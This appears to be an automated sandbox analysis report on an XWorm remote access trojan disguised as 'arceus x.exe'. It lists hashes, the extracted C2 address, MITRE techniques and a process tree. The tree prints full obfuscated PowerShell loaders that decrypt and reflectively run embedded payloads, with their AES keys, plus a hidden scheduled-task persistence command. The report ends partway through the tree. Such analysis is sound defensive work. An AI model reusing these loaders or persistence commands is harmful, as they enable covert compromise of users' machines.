xworm | 2f5ed04a9e2907c09ab4a3d6a984b68976926d2d99f21239bfbe8625b415ccc3

Analysis

max time kernel
48s
max time network
48s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
28/06/2024, 11:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

arceus x.exe
Size

10.3MB
MD5

380f08da7396daa261f7edabdc161388
SHA1

3622717512e77bb2ea51c9af995fa1c359413d8f
SHA256

2f5ed04a9e2907c09ab4a3d6a984b68976926d2d99f21239bfbe8625b415ccc3
SHA512

f724db6274890b9472067437f69a4d0d01bc4d911a32515d52c502d8524a31c1563641fed55d2021e9853bb2c1618aec24ac23c9f074b7331be4032917598424
SSDEEP

196608:p6iDnLZQi21bRqt9Vs9sMm2agR2wCg6N6FYx1jg+elKIK0G8V1f83:plDLvgbRWs93dW9AFYH8kd0Ge83

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

amount-socket.gl.at.ply.gg:29643

Mutex

CBOJbsqFCwukBOQm

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3148-137-0x0000000007D90000-0x0000000007DA0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4128	powershell.exe
1956	powershell.exe
4656	powershell.exe
3148	powershell.exe
1792	powershell.exe
2832	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2852	2832	WerFault.exe	124

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
864	msedge.exe
864	msedge.exe
1188	msedge.exe
1188	msedge.exe
4128	powershell.exe
4128	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
4128	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
1792	powershell.exe
1792	powershell.exe
1792	powershell.exe
2640	identity_helper.exe
2640	identity_helper.exe
2832	powershell.exe
2832	powershell.exe
3148	powershell.exe
2832	powershell.exe
1776	msedge.exe
1776	msedge.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3148	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4656	powershell.exe
Token: SeSecurityPrivilege	4656	powershell.exe
Token: SeTakeOwnershipPrivilege	4656	powershell.exe
Token: SeLoadDriverPrivilege	4656	powershell.exe
Token: SeSystemProfilePrivilege	4656	powershell.exe
Token: SeSystemtimePrivilege	4656	powershell.exe
Token: SeProfSingleProcessPrivilege	4656	powershell.exe
Token: SeIncBasePriorityPrivilege	4656	powershell.exe
Token: SeCreatePagefilePrivilege	4656	powershell.exe
Token: SeBackupPrivilege	4656	powershell.exe
Token: SeRestorePrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeSystemEnvironmentPrivilege	4656	powershell.exe
Token: SeRemoteShutdownPrivilege	4656	powershell.exe
Token: SeUndockPrivilege	4656	powershell.exe
Token: SeManageVolumePrivilege	4656	powershell.exe
Token: 33	4656	powershell.exe
Token: 34	4656	powershell.exe
Token: 35	4656	powershell.exe
Token: 36	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4656	powershell.exe
Token: SeSecurityPrivilege	4656	powershell.exe
Token: SeTakeOwnershipPrivilege	4656	powershell.exe
Token: SeLoadDriverPrivilege	4656	powershell.exe
Token: SeSystemProfilePrivilege	4656	powershell.exe
Token: SeSystemtimePrivilege	4656	powershell.exe
Token: SeProfSingleProcessPrivilege	4656	powershell.exe
Token: SeIncBasePriorityPrivilege	4656	powershell.exe
Token: SeCreatePagefilePrivilege	4656	powershell.exe
Token: SeBackupPrivilege	4656	powershell.exe
Token: SeRestorePrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeSystemEnvironmentPrivilege	4656	powershell.exe
Token: SeRemoteShutdownPrivilege	4656	powershell.exe
Token: SeUndockPrivilege	4656	powershell.exe
Token: SeManageVolumePrivilege	4656	powershell.exe
Token: 33	4656	powershell.exe
Token: 34	4656	powershell.exe
Token: 35	4656	powershell.exe
Token: 36	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4656	powershell.exe
Token: SeSecurityPrivilege	4656	powershell.exe
Token: SeTakeOwnershipPrivilege	4656	powershell.exe
Token: SeLoadDriverPrivilege	4656	powershell.exe
Token: SeSystemProfilePrivilege	4656	powershell.exe
Token: SeSystemtimePrivilege	4656	powershell.exe
Token: SeProfSingleProcessPrivilege	4656	powershell.exe
Token: SeIncBasePriorityPrivilege	4656	powershell.exe
Token: SeCreatePagefilePrivilege	4656	powershell.exe
Token: SeBackupPrivilege	4656	powershell.exe
Token: SeRestorePrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeSystemEnvironmentPrivilege	4656	powershell.exe
Token: SeRemoteShutdownPrivilege	4656	powershell.exe
Token: SeUndockPrivilege	4656	powershell.exe
Token: SeManageVolumePrivilege	4656	powershell.exe
Token: 33	4656	powershell.exe
Token: 34	4656	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe
1188	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3148	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1444 wrote to memory of 1792	1444	arceus x.exe	77
PID 1444 wrote to memory of 1792	1444	arceus x.exe	77
PID 1444 wrote to memory of 1792	1444	arceus x.exe	77
PID 1792 wrote to memory of 1800	1792	cmd.exe	81
PID 1792 wrote to memory of 1800	1792	cmd.exe	81
PID 1792 wrote to memory of 1800	1792	cmd.exe	81
PID 1792 wrote to memory of 4364	1792	cmd.exe	82
PID 1792 wrote to memory of 4364	1792	cmd.exe	82
PID 1792 wrote to memory of 4364	1792	cmd.exe	82
PID 1792 wrote to memory of 1624	1792	cmd.exe	83
PID 1792 wrote to memory of 1624	1792	cmd.exe	83
PID 1792 wrote to memory of 1624	1792	cmd.exe	83
PID 1792 wrote to memory of 2060	1792	cmd.exe	84
PID 1792 wrote to memory of 2060	1792	cmd.exe	84
PID 1792 wrote to memory of 2060	1792	cmd.exe	84
PID 2060 wrote to memory of 3836	2060	cmd.exe	85
PID 2060 wrote to memory of 3836	2060	cmd.exe	85
PID 2060 wrote to memory of 3836	2060	cmd.exe	85
PID 4364 wrote to memory of 3444	4364	cmd.exe	86
PID 4364 wrote to memory of 3444	4364	cmd.exe	86
PID 4364 wrote to memory of 3444	4364	cmd.exe	86
PID 1800 wrote to memory of 3556	1800	cmd.exe	89
PID 1800 wrote to memory of 3556	1800	cmd.exe	89
PID 1800 wrote to memory of 3556	1800	cmd.exe	89
PID 1624 wrote to memory of 2100	1624	cmd.exe	91
PID 1624 wrote to memory of 2100	1624	cmd.exe	91
PID 1624 wrote to memory of 2100	1624	cmd.exe	91
PID 3444 wrote to memory of 1216	3444	cmd.exe	93
PID 3444 wrote to memory of 1216	3444	cmd.exe	93
PID 3444 wrote to memory of 1216	3444	cmd.exe	93
PID 2100 wrote to memory of 1188	2100	cmd.exe	94
PID 2100 wrote to memory of 1188	2100	cmd.exe	94
PID 1188 wrote to memory of 1884	1188	msedge.exe	95
PID 1188 wrote to memory of 1884	1188	msedge.exe	95
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96
PID 1188 wrote to memory of 5048	1188	msedge.exe	96

C:\Users\Admin\AppData\Local\Temp\arceus x.exe
"C:\Users\Admin\AppData\Local\Temp\arceus x.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat"
      4⤵
      PID:3556
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:3748
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_822_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1792
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs"
        6⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat" "
        7⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        8⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2832
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1692
        9⤵
        Program crash
        
        PID:2852
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3444
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
        5⤵
        
        PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=fboNTcjJ8bo
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1188
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda9c33cb8,0x7ffda9c33cc8,0x7ffda9c33cd8
        6⤵
        
        PID:1884
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:2
        6⤵
        
        PID:5048
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:864
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
        6⤵
        
        PID:788
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
        6⤵
        
        PID:1600
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
        6⤵
        
        PID:3060
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
        6⤵
        
        PID:72
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
        6⤵
        
        PID:1836
      - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2640
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1776
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
        6⤵
        
        PID:1160
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat"
      4⤵
      PID:3836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:3656
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
